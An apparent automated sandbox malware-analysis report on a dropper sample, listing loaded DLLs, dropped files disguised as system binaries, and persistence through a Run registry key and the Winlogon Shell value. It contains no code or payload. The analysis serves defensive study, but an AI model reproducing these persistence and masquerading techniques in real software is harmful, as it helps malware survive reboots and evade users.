                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ktmw32.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winnsi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: rasadhlp.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: wbemcomn.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: amsi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dwrite.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winmm.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: winmmbase.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: mmdevapi.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: devobj.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ksuser.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: avrt.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: audioses.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: powrprof.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: msacm32.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: midimap.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: windowscodecs.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: mscoree.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: version.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: uxtheme.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: windows.storage.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: wldp.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: profapi.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder | Window detected: More than 3 window changes detected
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | Directory created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | Directory created: C:\Program Files\Windows Portable Devices\8e809f57164876
                                    Source: 544WP3NHaP.exe | Static file information: File size 2235083 > 1048576
                                    Source: 544WP3NHaP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 544WP3NHaP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 544WP3NHaP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 544WP3NHaP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 544WP3NHaP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 544WP3NHaP.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 544WP3NHaP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 544WP3NHaP.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.pdb source: bridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp
                                    Source: 544WP3NHaP.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 544WP3NHaP.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 544WP3NHaP.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 544WP3NHaP.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 544WP3NHaP.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe | File created: C:\bridgemssurrogateintonet\__tmp_rar_sfx_access_check_7325703
                                    Source: 544WP3NHaP.exe | Static PE information: section name: .didat
                                    Source: bridgeportDhcpcommon.exe.0.dr | Static PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe.5.dr | Static PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe0.5.dr | Static PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe1.5.dr | Static PE information: section name: .text entropy: 7.5423410987344
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe2.5.dr | Static PE information: section name: .text entropy: 7.5423410987344
                                    Source: SearchApp.exe.5.dr | Static PE information: section name: .text entropy: 7.5423410987344

                                    Persistence and Installation Behavior

                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | File created: C:\Users\user\Desktop\AjJOuhvp.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Recovery\SearchApp.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Users\user\Desktop\LsbmIiGn.log
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | File created: C:\Users\user\Desktop\KSdeeKAW.log
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | File created: C:\Users\user\Desktop\atZTrSKs.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Users\user\Desktop\BJIWYGBF.log
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe | File created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Users\user\Desktop\qeNySdhc.log
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe | File created: C:\Users\user\Desktop\sgzhoMlY.log
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe | File created: C:\Users\user\Desktop\mEBzyVHW.log

                                    Boot Survival

                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
